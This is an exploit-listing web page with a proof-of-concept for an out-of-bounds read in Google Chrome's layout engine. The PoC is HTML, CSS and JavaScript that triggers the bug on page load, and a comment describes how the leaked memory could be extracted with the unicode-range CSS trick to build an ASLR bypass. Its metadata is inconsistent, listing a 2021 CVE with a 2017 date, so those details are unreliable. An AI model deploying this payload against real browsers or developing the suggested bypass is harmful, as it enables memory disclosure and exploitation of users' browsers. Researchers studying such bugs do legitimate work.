Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
CVE-2021-27896 | CWE-125 | Not disclosed | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Anonymous | High | Remote | 2017-02-23 |
Google Chrome 'layout' Out-of-Bounds Read <!-- PoC: --> <style> content { contain: size layout; } </style> <script> function leak() { document.execCommand("selectAll"); opt.text = ""; } </script> <body onload=leak()> <content> <select> <option id="opt">aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</option> </select> </content> <!-- Since this is a layout bug AFAIK the leaked data can't be obtained via DOM calls, however it's possible to obtain it using tricks like unicode-range CSS descriptor (credits to Jann Horn for coming up with that approach) which is likely sufficient to turn this into an ASLR bypass. -->
Copyright ©2024 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.